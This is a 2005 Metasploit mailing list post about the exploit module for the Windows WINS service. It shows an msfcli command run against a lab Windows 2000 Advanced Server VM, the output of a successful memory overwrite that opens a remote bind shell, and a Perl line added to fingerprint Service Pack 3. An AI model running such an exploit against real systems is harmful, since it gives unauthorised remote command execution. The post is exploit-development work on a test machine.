Metasploit mailing list archives

WINS Fingerprint update


From: grutz at jingojango.net (grutz at jingojango.net)
Date: Wed, 12 Jan 2005 17:21:30 -0800

On Wed, Jan 12, 2005 at 02:47:31PM -0800, grutz at jingojango.net brazenly wrote:
> I didn't have SP4 handy to put on the vm image.

Just put SP4 on Win2KAS and results are the same:

$ ./msfcli wins RHOST=192.168.191.10 PAYLOAD=win32_bind TARGET=0 E
[*] Starting Bind Handler.
[*] Pointers: [0x05371e90] 0x053dffa4 0x77f98191 0x77f89640
[*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40)
[*] Got connection from 192.168.191.1:3773 <-> 192.168.191.10:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

So for Win2KASsp3, added this line:

        $sp = '3'   if $ptrs[3] == 0x77f81648;          # add for Win2K Advanced Server, SP3

-- 
              ..:[ grutz at jingojango dot net ]:..
 GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
       "There's just no amusing way to say, 'I have a CISSP'."